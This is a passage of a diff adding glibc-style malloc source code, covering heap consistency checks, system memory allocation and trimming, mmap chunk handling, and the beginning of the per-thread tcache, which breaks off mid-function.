+# define check_free_chunk(A, P)         do_check_free_chunk (A, P)
+# define check_inuse_chunk(A, P)        do_check_inuse_chunk (A, P)
+# define check_remalloced_chunk(A, P, N) do_check_remalloced_chunk (A, P, N)
+# define check_malloced_chunk(A, P, N)   do_check_malloced_chunk (A, P, N)
+# define check_malloc_state(A)         do_check_malloc_state (A)
+
+/*
+   Properties of all chunks
+ */
+
+static void
+do_check_chunk (mstate av, mchunkptr p)
+{
+  unsigned long sz = chunksize (p);
+  /* min and max possible addresses assuming contiguous allocation */
+  char *max_address = (char *) (av->top) + chunksize (av->top);
+  char *min_address = max_address - av->system_mem;
+
+  if (!chunk_is_mmapped (p))
+    {
+      /* Has legal address ... */
+      if (p != av->top)
+        {
+          if (contiguous (av))
+            {
+              assert (((char *) p) >= min_address);
+              assert (((char *) p + sz) <= ((char *) (av->top)));
+            }
+        }
+      else
+        {
+          /* top size is always at least MINSIZE */
+          assert ((unsigned long) (sz) >= MINSIZE);
+          /* top predecessor always marked inuse */
+          assert (prev_inuse (p));
+        }
+    }
+  else if (!DUMPED_MAIN_ARENA_CHUNK (p))
+    {
+      /* address is outside main heap  */
+      if (contiguous (av) && av->top != initial_top (av))
+        {
+          assert (((char *) p) < min_address || ((char *) p) >= max_address);
+        }
+      /* chunk is page-aligned */
+      assert (((prev_size (p) + sz) & (GLRO (dl_pagesize) - 1)) == 0);
+      /* mem is aligned */
+      assert (aligned_OK (chunk2mem (p)));
+    }
+}
+
+/*
+   Properties of free chunks
+ */
+
+static void
+do_check_free_chunk (mstate av, mchunkptr p)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+  mchunkptr next = chunk_at_offset (p, sz);
+
+  do_check_chunk (av, p);
+
+  /* Chunk must claim to be free ... */
+  assert (!inuse (p));
+  assert (!chunk_is_mmapped (p));
+
+  /* Unless a special marker, must have OK fields */
+  if ((unsigned long) (sz) >= MINSIZE)
+    {
+      assert ((sz & MALLOC_ALIGN_MASK) == 0);
+      assert (aligned_OK (chunk2mem (p)));
+      /* ... matching footer field */
+      assert (prev_size (next_chunk (p)) == sz);
+      /* ... and is fully consolidated */
+      assert (prev_inuse (p));
+      assert (next == av->top || inuse (next));
+
+      /* ... and has minimally sane links */
+      assert (p->fd->bk == p);
+      assert (p->bk->fd == p);
+    }
+  else /* markers are always of size SIZE_SZ */
+    assert (sz == SIZE_SZ);
+}
+
+/*
+   Properties of inuse chunks
+ */
+
+static void
+do_check_inuse_chunk (mstate av, mchunkptr p)
+{
+  mchunkptr next;
+
+  do_check_chunk (av, p);
+
+  if (chunk_is_mmapped (p))
+    return; /* mmapped chunks have no next/prev */
+
+  /* Check whether it claims to be in use ... */
+  assert (inuse (p));
+
+  next = next_chunk (p);
+
+  /* ... and is surrounded by OK chunks.
+     Since more things can be checked with free chunks than inuse ones,
+     if an inuse chunk borders them and debug is on, it's worth doing them.
+   */
+  if (!prev_inuse (p))
+    {
+      /* Note that we cannot even look at prev unless it is not inuse */
+      mchunkptr prv = prev_chunk (p);
+      assert (next_chunk (prv) == p);
+      do_check_free_chunk (av, prv);
+    }
+
+  if (next == av->top)
+    {
+      assert (prev_inuse (next));
+      assert (chunksize (next) >= MINSIZE);
+    }
+  else if (!inuse (next))
+    do_check_free_chunk (av, next);
+}
+
+/*
+   Properties of chunks recycled from fastbins
+ */
+
+static void
+do_check_remalloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+
+  if (!chunk_is_mmapped (p))
+    {
+      assert (av == arena_for_chunk (p));
+      if (chunk_main_arena (p))
+        assert (av == &main_arena);
+      else
+        assert (av != &main_arena);
+    }
+
+  do_check_inuse_chunk (av, p);
+
+  /* Legal size ... */
+  assert ((sz & MALLOC_ALIGN_MASK) == 0);
+  assert ((unsigned long) (sz) >= MINSIZE);
+  /* ... and alignment */
+  assert (aligned_OK (chunk2mem (p)));
+  /* chunk is less than MINSIZE more than request */
+  assert ((long) (sz) - (long) (s) >= 0);
+  assert ((long) (sz) - (long) (s + MINSIZE) < 0);
+}
+
+/*
+   Properties of nonrecycled chunks at the point they are malloced
+ */
+
+static void
+do_check_malloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  /* same as recycled case ... */
+  do_check_remalloced_chunk (av, p, s);
+
+  /*
+     ... plus,  must obey implementation invariant that prev_inuse is
+     always true of any allocated chunk; i.e., that each allocated
+     chunk borders either a previously allocated and still in-use
+     chunk, or the base of its memory arena. This is ensured
+     by making all allocations from the `lowest' part of any found
+     chunk.  This does not necessarily hold however for chunks
+     recycled via fastbins.
+   */
+
+  assert (prev_inuse (p));
+}
+
+
+/*
+   Properties of malloc_state.
+
+   This may be useful for debugging malloc, as well as detecting user
+   programmer errors that somehow write into malloc_state.
+
+   If you are extending or experimenting with this malloc, you can
+   probably figure out how to hack this routine to print out or
+   display chunk addresses, sizes, bins, and other instrumentation.
+ */
+
+static void
+do_check_malloc_state (mstate av)
+{
+  int i;
+  mchunkptr p;
+  mchunkptr q;
+  mbinptr b;
+  unsigned int idx;
+  INTERNAL_SIZE_T size;
+  unsigned long total = 0;
+  int max_fast_bin;
+
+  /* internal size_t must be no wider than pointer type */
+  assert (sizeof (INTERNAL_SIZE_T) <= sizeof (char *));
+
+  /* alignment is a power of 2 */
+  assert ((MALLOC_ALIGNMENT & (MALLOC_ALIGNMENT - 1)) == 0);
+
+  /* Check the arena is initialized. */
+  assert (av->top != 0);
+
+  /* No memory has been allocated yet, so doing more tests is not possible.  */
+  if (av->top == initial_top (av))
+    return;
+
+  /* pagesize is a power of 2 */
+  assert (powerof2(GLRO (dl_pagesize)));
+
+  /* A contiguous main_arena is consistent with sbrk_base.  */
+  if (av == &main_arena && contiguous (av))
+    assert ((char *) mp_.sbrk_base + av->system_mem ==
+            (char *) av->top + chunksize (av->top));
+
+  /* properties of fastbins */
+
+  /* max_fast is in allowed range */
+  assert ((get_max_fast () & ~1) <= request2size (MAX_FAST_SIZE));
+
+  max_fast_bin = fastbin_index (get_max_fast ());
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      p = fastbin (av, i);
+
+      /* The following test can only be performed for the main arena.
+         While mallopt calls malloc_consolidate to get rid of all fast
+         bins (especially those larger than the new maximum) this does
+         only happen for the main arena.  Trying to do this for any
+         other arena would mean those arenas have to be locked and
+         malloc_consolidate be called for them.  This is excessive.  And
+         even if this is acceptable to somebody it still cannot solve
+         the problem completely since if the arena is locked a
+         concurrent malloc call might create a new arena which then
+         could use the newly invalid fast bins.  */
+
+      /* all bins past max_fast are empty */
+      if (av == &main_arena && i > max_fast_bin)
+        assert (p == 0);
+
+      while (p != 0)
+        {
+          /* each chunk claims to be inuse */
+          do_check_inuse_chunk (av, p);
+          total += chunksize (p);
+          /* chunk belongs in this bin */
+          assert (fastbin_index (chunksize (p)) == i);
+          p = p->fd;
+        }
+    }
+
+  /* check normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+
+      /* binmap is accurate (except for bin 1 == unsorted_chunks) */
+      if (i >= 2)
+        {
+          unsigned int binbit = get_binmap (av, i);
+          int empty = last (b) == b;
+          if (!binbit)
+            assert (empty);
+          else if (!empty)
+            assert (binbit);
+        }
+
+      for (p = last (b); p != b; p = p->bk)
+        {
+          /* each chunk claims to be free */
+          do_check_free_chunk (av, p);
+          size = chunksize (p);
+          total += size;
+          if (i >= 2)
+            {
+              /* chunk belongs in bin */
+              idx = bin_index (size);
+              assert (idx == i);
+              /* lists are sorted */
+              assert (p->bk == b ||
+                      (unsigned long) chunksize (p->bk) >= (unsigned long) chunksize (p));
+
+              if (!in_smallbin_range (size))
+                {
+                  if (p->fd_nextsize != NULL)
+                    {
+                      if (p->fd_nextsize == p)
+                        assert (p->bk_nextsize == p);
+                      else
+                        {
+                          if (p->fd_nextsize == first (b))
+                            assert (chunksize (p) < chunksize (p->fd_nextsize));
+                          else
+                            assert (chunksize (p) > chunksize (p->fd_nextsize));
+
+                          if (p == first (b))
+                            assert (chunksize (p) > chunksize (p->bk_nextsize));
+                          else
+                            assert (chunksize (p) < chunksize (p->bk_nextsize));
+                        }
+                    }
+                  else
+                    assert (p->bk_nextsize == NULL);
+                }
+            }
+          else if (!in_smallbin_range (size))
+            assert (p->fd_nextsize == NULL && p->bk_nextsize == NULL);
+          /* chunk is followed by a legal chain of inuse chunks */
+          for (q = next_chunk (p);
+               (q != av->top && inuse (q) &&
+                (unsigned long) (chunksize (q)) >= MINSIZE);
+               q = next_chunk (q))
+            do_check_inuse_chunk (av, q);
+        }
+    }
+
+  /* top chunk is OK */
+  check_chunk (av, av->top);
+}
+#endif
+
+
+/* ----------------- Support for debugging hooks -------------------- */
+#include "hooks.c"
+
+
+/* ----------- Routines dealing with system allocation -------------- */
+
+/*
+   sysmalloc handles malloc cases requiring more memory from the system.
+   On entry, it is assumed that av->top does not have enough
+   space to service request for nb bytes, thus requiring that av->top
+   be extended or replaced.
+ */
+
+static void *
+sysmalloc (INTERNAL_SIZE_T nb, mstate av)
+{
+  mchunkptr old_top;              /* incoming value of av->top */
+  INTERNAL_SIZE_T old_size;       /* its size */
+  char *old_end;                  /* its end address */
+
+  long size;                      /* arg to first MORECORE or mmap call */
+  char *brk;                      /* return value from MORECORE */
+
+  long correction;                /* arg to 2nd MORECORE call */
+  char *snd_brk;                  /* 2nd return val */
+
+  INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
+  INTERNAL_SIZE_T end_misalign;   /* partial page left at end of new space */
+  char *aligned_brk;              /* aligned offset into brk */
+
+  mchunkptr p;                    /* the allocated/returned chunk */
+  mchunkptr remainder;            /* remainder from allocation */
+  unsigned long remainder_size;   /* its size */
+
+
+  size_t pagesize = GLRO (dl_pagesize);
+  bool tried_mmap = false;
+
+
+  /*
+     If have mmap, and the request size meets the mmap threshold, and
+     the system supports mmap, and there are few enough currently
+     allocated mmapped regions, try to directly map this request
+     rather than expanding top.
+   */
+
+  if (av == NULL
+      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
+	  && (mp_.n_mmaps < mp_.n_mmaps_max)))
+    {
+      char *mm;           /* return value from mmap call*/
+
+    try_mmap:
+      /*
+         Round up size to nearest page.  For mmapped chunks, the overhead
+         is one SIZE_SZ unit larger than for normal chunks, because there
+         is no following chunk whose prev_size field could be used.
+
+         See the front_misalign handling below, for glibc there is no
+         need for further alignments unless we have have high alignment.
+       */
+      if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+        size = ALIGN_UP (nb + SIZE_SZ, pagesize);
+      else
+        size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize);
+      tried_mmap = true;
+
+      /* Don't try if size wraps around 0 */
+      if ((unsigned long) (size) > (unsigned long) (nb))
+        {
+          mm = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+          if (mm != MAP_FAILED)
+            {
+              /*
+                 The offset to the start of the mmapped region is stored
+                 in the prev_size field of the chunk. This allows us to adjust
+                 returned start address to meet alignment requirements here
+                 and in memalign(), and still be able to compute proper
+                 address argument for later munmap in free() and realloc().
+               */
+
+              if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                {
+                  /* For glibc, chunk2mem increases the address by 2*SIZE_SZ and
+                     MALLOC_ALIGN_MASK is 2*SIZE_SZ-1.  Each mmap'ed area is page
+                     aligned and therefore definitely MALLOC_ALIGN_MASK-aligned.  */
+                  assert (((INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK) == 0);
+                  front_misalign = 0;
+                }
+              else
+                front_misalign = (INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK;
+              if (front_misalign > 0)
+                {
+                  correction = MALLOC_ALIGNMENT - front_misalign;
+                  p = (mchunkptr) (mm + correction);
+		  set_prev_size (p, correction);
+                  set_head (p, (size - correction) | IS_MMAPPED);
+                }
+              else
+                {
+                  p = (mchunkptr) mm;
+		  set_prev_size (p, 0);
+                  set_head (p, size | IS_MMAPPED);
+                }
+
+              /* update statistics */
+
+              int new = atomic_exchange_and_add (&mp_.n_mmaps, 1) + 1;
+              atomic_max (&mp_.max_n_mmaps, new);
+
+              unsigned long sum;
+              sum = atomic_exchange_and_add (&mp_.mmapped_mem, size) + size;
+              atomic_max (&mp_.max_mmapped_mem, sum);
+
+              check_chunk (av, p);
+
+              return chunk2mem (p);
+            }
+        }
+    }
+
+  /* There are no usable arenas and mmap also failed.  */
+  if (av == NULL)
+    return 0;
+
+  /* Record incoming configuration of top */
+
+  old_top = av->top;
+  old_size = chunksize (old_top);
+  old_end = (char *) (chunk_at_offset (old_top, old_size));
+
+  brk = snd_brk = (char *) (MORECORE_FAILURE);
+
+  /*
+     If not the first time through, we require old_size to be
+     at least MINSIZE and to have prev_inuse set.
+   */
+
+  assert ((old_top == initial_top (av) && old_size == 0) ||
+          ((unsigned long) (old_size) >= MINSIZE &&
+           prev_inuse (old_top) &&
+           ((unsigned long) old_end & (pagesize - 1)) == 0));
+
+  /* Precondition: not enough current space to satisfy nb request */
+  assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
+
+
+  if (av != &main_arena)
+    {
+      heap_info *old_heap, *heap;
+      size_t old_heap_size;
+
+      /* First try to extend the current heap. */
+      old_heap = heap_for_ptr (old_top);
+      old_heap_size = old_heap->size;
+      if ((long) (MINSIZE + nb - old_size) > 0
+          && grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
+        {
+          av->system_mem += old_heap->size - old_heap_size;
+          set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
+                    | PREV_INUSE);
+        }
+      else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
+        {
+          /* Use a newly allocated heap.  */
+          heap->ar_ptr = av;
+          heap->prev = old_heap;
+          av->system_mem += heap->size;
+          /* Set up the new top.  */
+          top (av) = chunk_at_offset (heap, sizeof (*heap));
+          set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);
+
+          /* Setup fencepost and free the old top chunk with a multiple of
+             MALLOC_ALIGNMENT in size. */
+          /* The fencepost takes at least MINSIZE bytes, because it might
+             become the top chunk again later.  Note that a footer is set
+             up, too, although the chunk is marked in use. */
+          old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
+          set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ), 0 | PREV_INUSE);
+          if (old_size >= MINSIZE)
+            {
+              set_head (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ));
+              set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
+              _int_free (av, old_top, 1);
+            }
+          else
+            {
+              set_head (old_top, (old_size + 2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (old_top, (old_size + 2 * SIZE_SZ));
+            }
+        }
+      else if (!tried_mmap)
+        /* We can at least try to use to mmap memory.  */
+        goto try_mmap;
+    }
+  else     /* av == main_arena */
+
+
+    { /* Request enough space for nb + pad + overhead */
+      size = nb + mp_.top_pad + MINSIZE;
+
+      /*
+         If contiguous, we can subtract out existing space that we hope to
+         combine with new space. We add it back later only if
+         we don't actually get contiguous space.
+       */
+
+      if (contiguous (av))
+        size -= old_size;
+
+      /*
+         Round to a multiple of page size.
+         If MORECORE is not contiguous, this ensures that we only call it
+         with whole-page arguments.  And if MORECORE is contiguous and
+         this is not first time through, this preserves page-alignment of
+         previous calls. Otherwise, we correct to page-align below.
+       */
+
+      size = ALIGN_UP (size, pagesize);
+
+      /*
+         Don't try to call MORECORE if argument is so big as to appear
+         negative. Note that since mmap takes size_t arg, it may succeed
+         below even if we cannot call MORECORE.
+       */
+
+      if (size > 0)
+        {
+          brk = (char *) (MORECORE (size));
+          LIBC_PROBE (memory_sbrk_more, 2, brk, size);
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          /* Call the `morecore' hook if necessary.  */
+          void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+          if (__builtin_expect (hook != NULL, 0))
+            (*hook)();
+        }
+      else
+        {
+          /*
+             If have mmap, try using it as a backup when MORECORE fails or
+             cannot be used. This is worth doing on systems that have "holes" in
+             address space, so sbrk cannot extend to give contiguous space, but
+             space is available elsewhere.  Note that we ignore mmap max count
+             and threshold limits, since the space will not be used as a
+             segregated mmap region.
+           */
+
+          /* Cannot merge with old top, so add its size back in */
+          if (contiguous (av))
+            size = ALIGN_UP (size + old_size, pagesize);
+
+          /* If we are relying on mmap as backup, then use larger units */
+          if ((unsigned long) (size) < (unsigned long) (MMAP_AS_MORECORE_SIZE))
+            size = MMAP_AS_MORECORE_SIZE;
+
+          /* Don't try if size wraps around 0 */
+          if ((unsigned long) (size) > (unsigned long) (nb))
+            {
+              char *mbrk = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+              if (mbrk != MAP_FAILED)
+                {
+                  /* We do not need, and cannot use, another sbrk call to find end */
+                  brk = mbrk;
+                  snd_brk = brk + size;
+
+                  /*
+                     Record that we no longer have a contiguous sbrk region.
+                     After the first time mmap is used as backup, we do not
+                     ever rely on contiguous space since this could incorrectly
+                     bridge regions.
+                   */
+                  set_noncontiguous (av);
+                }
+            }
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          if (mp_.sbrk_base == 0)
+            mp_.sbrk_base = brk;
+          av->system_mem += size;
+
+          /*
+             If MORECORE extends previous space, we can likewise extend top size.
+           */
+
+          if (brk == old_end && snd_brk == (char *) (MORECORE_FAILURE))
+            set_head (old_top, (size + old_size) | PREV_INUSE);
+
+          else if (contiguous (av) && old_size && brk < old_end)
+	    /* Oops!  Someone else killed our space..  Can't touch anything.  */
+	    malloc_printerr ("break adjusted to free malloc space");
+
+          /*
+             Otherwise, make adjustments:
+
+           * If the first time through or noncontiguous, we need to call sbrk
+              just to find out where the end of memory lies.
+
+           * We need to ensure that all returned chunks from malloc will meet
+              MALLOC_ALIGNMENT
+
+           * If there was an intervening foreign sbrk, we need to adjust sbrk
+              request size to account for fact that we will not be able to
+              combine new space with existing space in old_top.
+
+           * Almost all systems internally allocate whole pages at a time, in
+              which case we might as well use the whole last page of request.
+              So we allocate enough more memory to hit a page boundary now,
+              which in turn causes future contiguous calls to page-align.
+           */
+
+          else
+            {
+              front_misalign = 0;
+              end_misalign = 0;
+              correction = 0;
+              aligned_brk = brk;
+
+              /* handle contiguous cases */
+              if (contiguous (av))
+                {
+                  /* Count foreign sbrk as system_mem.  */
+                  if (old_size)
+                    av->system_mem += brk - old_end;
+
+                  /* Guarantee alignment of first new chunk made from this space */
+
+                  front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                  if (front_misalign > 0)
+                    {
+                      /*
+                         Skip over some bytes to arrive at an aligned position.
+                         We don't need to specially mark these wasted front bytes.
+                         They will never be accessed anyway because
+                         prev_inuse of av->top (and any chunk created from its start)
+                         is always true after initialization.
+                       */
+
+                      correction = MALLOC_ALIGNMENT - front_misalign;
+                      aligned_brk += correction;
+                    }
+
+                  /*
+                     If this isn't adjacent to existing space, then we will not
+                     be able to merge with old_top space, so must add to 2nd request.
+                   */
+
+                  correction += old_size;
+
+                  /* Extend the end address to hit a page boundary */
+                  end_misalign = (INTERNAL_SIZE_T) (brk + size + correction);
+                  correction += (ALIGN_UP (end_misalign, pagesize)) - end_misalign;
+
+                  assert (correction >= 0);
+                  snd_brk = (char *) (MORECORE (correction));
+
+                  /*
+                     If can't allocate correction, try to at least find out current
+                     brk.  It might be enough to proceed without failing.
+
+                     Note that if second sbrk did NOT fail, we assume that space
+                     is contiguous with first sbrk. This is a safe assumption unless
+                     program is multithreaded but doesn't use locks and a foreign sbrk
+                     occurred between our first and second calls.
+                   */
+
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      correction = 0;
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                  else
+                    {
+                      /* Call the `morecore' hook if necessary.  */
+                      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+                      if (__builtin_expect (hook != NULL, 0))
+                        (*hook)();
+                    }
+                }
+
+              /* handle non-contiguous cases */
+              else
+                {
+                  if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                    /* MORECORE/mmap must correctly align */
+                    assert (((unsigned long) chunk2mem (brk) & MALLOC_ALIGN_MASK) == 0);
+                  else
+                    {
+                      front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                      if (front_misalign > 0)
+                        {
+                          /*
+                             Skip over some bytes to arrive at an aligned position.
+                             We don't need to specially mark these wasted front bytes.
+                             They will never be accessed anyway because
+                             prev_inuse of av->top (and any chunk created from its start)
+                             is always true after initialization.
+                           */
+
+                          aligned_brk += MALLOC_ALIGNMENT - front_misalign;
+                        }
+                    }
+
+                  /* Find out current end of memory */
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                }
+
+              /* Adjust top based on results of second sbrk */
+              if (snd_brk != (char *) (MORECORE_FAILURE))
+                {
+                  av->top = (mchunkptr) aligned_brk;
+                  set_head (av->top, (snd_brk - aligned_brk + correction) | PREV_INUSE);
+                  av->system_mem += correction;
+
+                  /*
+                     If not the first time through, we either have a
+                     gap due to foreign sbrk or a non-contiguous region.  Insert a
+                     double fencepost at old_top to prevent consolidation with space
+                     we don't own. These fenceposts are artificial chunks that are
+                     marked as inuse and are in any case too small to use.  We need
+                     two to make sizes and alignments work out.
+                   */
+
+                  if (old_size != 0)
+                    {
+                      /*
+                         Shrink old_top to insert fenceposts, keeping size a
+                         multiple of MALLOC_ALIGNMENT. We know there is at least
+                         enough space in old_top to do this.
+                       */
+                      old_size = (old_size - 4 * SIZE_SZ) & ~MALLOC_ALIGN_MASK;
+                      set_head (old_top, old_size | PREV_INUSE);
+
+                      /*
+                         Note that the following assignments completely overwrite
+                         old_top when old_size was previously MINSIZE.  This is
+                         intentional. We need the fencepost, even if old_top otherwise gets
+                         lost.
+                       */
+		      set_head (chunk_at_offset (old_top, old_size),
+				(2 * SIZE_SZ) | PREV_INUSE);
+		      set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ),
+				(2 * SIZE_SZ) | PREV_INUSE);
+
+                      /* If possible, release the rest. */
+                      if (old_size >= MINSIZE)
+                        {
+                          _int_free (av, old_top, 1);
+                        }
+                    }
+                }
+            }
+        }
+    } /* if (av !=  &main_arena) */
+
+  if ((unsigned long) av->system_mem > (unsigned long) (av->max_system_mem))
+    av->max_system_mem = av->system_mem;
+  check_malloc_state (av);
+
+  /* finally, do the allocation */
+  p = av->top;
+  size = chunksize (p);
+
+  /* check that one of the above allocation paths succeeded */
+  if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+    {
+      remainder_size = size - nb;
+      remainder = chunk_at_offset (p, nb);
+      av->top = remainder;
+      set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE);
+      check_malloced_chunk (av, p, nb);
+      return chunk2mem (p);
+    }
+
+  /* catch all failure paths */
+  __set_errno (ENOMEM);
+  return 0;
+}
+
+
+/*
+   systrim is an inverse of sorts to sysmalloc.  It gives memory back
+   to the system (via negative arguments to sbrk) if there is unused
+   memory at the `high' end of the malloc pool. It is called
+   automatically by free() when top space exceeds the trim
+   threshold. It is also called by the public malloc_trim routine.  It
+   returns 1 if it actually released any memory, else 0.
+ */
+
+static int
+systrim (size_t pad, mstate av)
+{
+  long top_size;         /* Amount of top-most memory */
+  long extra;            /* Amount to release */
+  long released;         /* Amount actually released */
+  char *current_brk;     /* address returned by pre-check sbrk call */
+  char *new_brk;         /* address returned by post-check sbrk call */
+  size_t pagesize;
+  long top_area;
+
+  pagesize = GLRO (dl_pagesize);
+  top_size = chunksize (av->top);
+
+  top_area = top_size - MINSIZE - 1;
+  if (top_area <= pad)
+    return 0;
+
+  /* Release in pagesize units and round down to the nearest page.  */
+  extra = ALIGN_DOWN(top_area - pad, pagesize);
+
+  if (extra == 0)
+    return 0;
+
+  /*
+     Only proceed if end of memory is where we last set it.
+     This avoids problems if there were foreign sbrk calls.
+   */
+  current_brk = (char *) (MORECORE (0));
+  if (current_brk == (char *) (av->top) + top_size)
+    {
+      /*
+         Attempt to release memory. We ignore MORECORE return value,
+         and instead call again to find out where new end of memory is.
+         This avoids problems if first call releases less than we asked,
+         of if failure somehow altered brk value. (We could still
+         encounter problems if it altered brk in some very bad way,
+         but the only thing we can do is adjust anyway, which will cause
+         some downstream failure.)
+       */
+
+      MORECORE (-extra);
+      /* Call the `morecore' hook if necessary.  */
+      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+      if (__builtin_expect (hook != NULL, 0))
+        (*hook)();
+      new_brk = (char *) (MORECORE (0));
+
+      LIBC_PROBE (memory_sbrk_less, 2, new_brk, extra);
+
+      if (new_brk != (char *) MORECORE_FAILURE)
+        {
+          released = (long) (current_brk - new_brk);
+
+          if (released != 0)
+            {
+              /* Success. Adjust top. */
+              av->system_mem -= released;
+              set_head (av->top, (top_size - released) | PREV_INUSE);
+              check_malloc_state (av);
+              return 1;
+            }
+        }
+    }
+  return 0;
+}
+
+static void
+munmap_chunk (mchunkptr p)
+{
+  INTERNAL_SIZE_T size = chunksize (p);
+
+  assert (chunk_is_mmapped (p));
+
+  /* Do nothing if the chunk is a faked mmapped chunk in the dumped
+     main arena.  We never free this memory.  */
+  if (DUMPED_MAIN_ARENA_CHUNK (p))
+    return;
+
+  uintptr_t block = (uintptr_t) p - prev_size (p);
+  size_t total_size = prev_size (p) + size;
+  /* Unfortunately we have to do the compilers job by hand here.  Normally
+     we would test BLOCK and TOTAL-SIZE separately for compliance with the
+     page size.  But gcc does not recognize the optimization possibility
+     (in the moment at least) so we combine the two values into one before
+     the bit test.  */
+  if (__builtin_expect (((block | total_size) & (GLRO (dl_pagesize) - 1)) != 0, 0))
+    malloc_printerr ("munmap_chunk(): invalid pointer");
+
+  atomic_decrement (&mp_.n_mmaps);
+  atomic_add (&mp_.mmapped_mem, -total_size);
+
+  /* If munmap failed the process virtual memory address space is in a
+     bad shape.  Just leave the block hanging around, the process will
+     terminate shortly anyway since not much can be done.  */
+  __munmap ((char *) block, total_size);
+}
+
+#if HAVE_MREMAP
+
+static mchunkptr
+mremap_chunk (mchunkptr p, size_t new_size)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T offset = prev_size (p);
+  INTERNAL_SIZE_T size = chunksize (p);
+  char *cp;
+
+  assert (chunk_is_mmapped (p));
+  assert (((size + offset) & (GLRO (dl_pagesize) - 1)) == 0);
+
+  /* Note the extra SIZE_SZ overhead as in mmap_chunk(). */
+  new_size = ALIGN_UP (new_size + offset + SIZE_SZ, pagesize);
+
+  /* No need to remap if the number of pages does not change.  */
+  if (size + offset == new_size)
+    return p;
+
+  cp = (char *) __mremap ((char *) p - offset, size + offset, new_size,
+                          MREMAP_MAYMOVE);
+
+  if (cp == MAP_FAILED)
+    return 0;
+
+  p = (mchunkptr) (cp + offset);
+
+  assert (aligned_OK (chunk2mem (p)));
+
+  assert (prev_size (p) == offset);
+  set_head (p, (new_size - offset) | IS_MMAPPED);
+
+  INTERNAL_SIZE_T new;
+  new = atomic_exchange_and_add (&mp_.mmapped_mem, new_size - size - offset)
+        + new_size - size - offset;
+  atomic_max (&mp_.max_mmapped_mem, new);
+  return p;
+}
+#endif /* HAVE_MREMAP */
+
+/*------------------------ Public wrappers. --------------------------------*/
+
+#if USE_TCACHE
+
+/* We overlay this structure on the user-data portion of a chunk when
+   the chunk is stored in the per-thread cache.  */
+typedef struct tcache_entry
+{
+  struct tcache_entry *next;
+} tcache_entry;
+
+/* There is one of these for each thread, which contains the
+   per-thread cache (hence "tcache_perthread_struct").  Keeping
+   overall size low is mildly important.  Note that COUNTS and ENTRIES
+   are redundant (we could have just counted the linked list each
+   time), this is for performance reasons.  */
+typedef struct tcache_perthread_struct
+{
+  char counts[TCACHE_MAX_BINS];
+  tcache_entry *entries[TCACHE_MAX_BINS];
+} tcache_perthread_struct;
+
+static __thread bool tcache_shutting_down = false;
+static __thread tcache_perthread_struct *tcache = NULL;
+
+/* Caller must ensure that we know tc_idx is valid and there's room
+   for more chunks.  */
+static __always_inline void
+tcache_put (mchunkptr chunk, size_t tc_idx)
+{
+  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
+  assert (tc_idx < TCACHE_MAX_BINS);
+  e->next = tcache->entries[tc_idx];
+  tcache->entries[tc_idx] = e;
+  ++(tcache->counts[tc_idx]);
+}
+
+/* Caller must ensure that we know tc_idx is valid and there's
+   available chunks to remove.  */
+static __always_inline void *
+tcache_get (size_t tc_idx)
+{
+  tcache_entry *e = tcache->entries[tc_idx];
+  assert (tc_idx < TCACHE_MAX_BINS);
+  assert (tcache->entries[tc_idx] > 0);
+  tcache->entries[tc_idx] = e->next;
+  --(tcache->counts[tc_idx]);
+  return (void *) e;
+}
+
+static void
+tcache_thread_shutdown (void)
+{
+  int i;
+  tcache_perthread_struct *tcache_tmp = tcache;
+
+  if (!tcache)
+    return;
+
+  /* Disable the tcache and prevent it from being reinitialized.  */
+  tcache = NULL;
+  tcache_shutting_down = true;
+
+  /* Free all of the entries and the tcache itself back to the arena
+     heap for coalescing.  */
+  for (i = 0; i < TCACHE_MAX_BINS; ++i)
+    {
+      while (tcache_tmp->entries[i])
